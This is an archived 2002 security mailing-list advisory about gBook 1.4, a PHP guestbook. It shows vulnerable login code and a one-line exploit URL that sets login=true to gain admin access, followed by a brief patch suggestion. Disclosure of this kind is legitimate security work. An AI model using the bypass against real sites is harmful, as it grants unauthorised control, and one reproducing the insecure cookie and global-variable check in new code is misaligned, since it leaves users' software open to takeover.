gBook

From: Frog Man (leseulfrogat_private)
Date: Tue Oct 22 2002 - 13:28:49 PDT

Next message: Sym Security: "Re: Sniffing Administrator's Password in Symantec Firewall/VPN Appliance V. 200R"

Previous message: Blud Clot: "FlashFXP 1.4 Local Password Disclosure Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
АААААААААААААА
Language : PHP
Tested version : 1.4
Problem : Admin access

PHP Code :
АААААААААА
/gb/index.php :
------------------------------------------------------
<?php
include("config.inc.php");
if($action == "login") {
	if($user == $loginu && $pw == $loginpw)
	{
		setcookie("login", "true", time()+3600);
		header("location: index.php");
	}
	else
	{
		setcookie("login", "false", -3600);
		header("location: index.php?fehler=login");
	}
}
?>
[...]
<?php
if($login == "true")
{
[ADMIN CODE]
[...]
------------------------------------------------------

Exploit :
ААААААААА
http://[Target]/gb/index.php?login=true

Patch :
ААААААА
Using of .htaccess.

More details in french :
http://www.frog-man.org/tutos/gBook.txt
Translated by google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FgBook.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII

frog-m@n

_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! 
http://www.msn.fr/msger/default.asp

Next message: Sym Security: "Re: Sniffing Administrator's Password in Symantec Firewall/VPN Appliance V. 200R"
Previous message: Blud Clot: "FlashFXP 1.4 Local Password Disclosure Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Oct 22 2002 - 15:26:34 PDT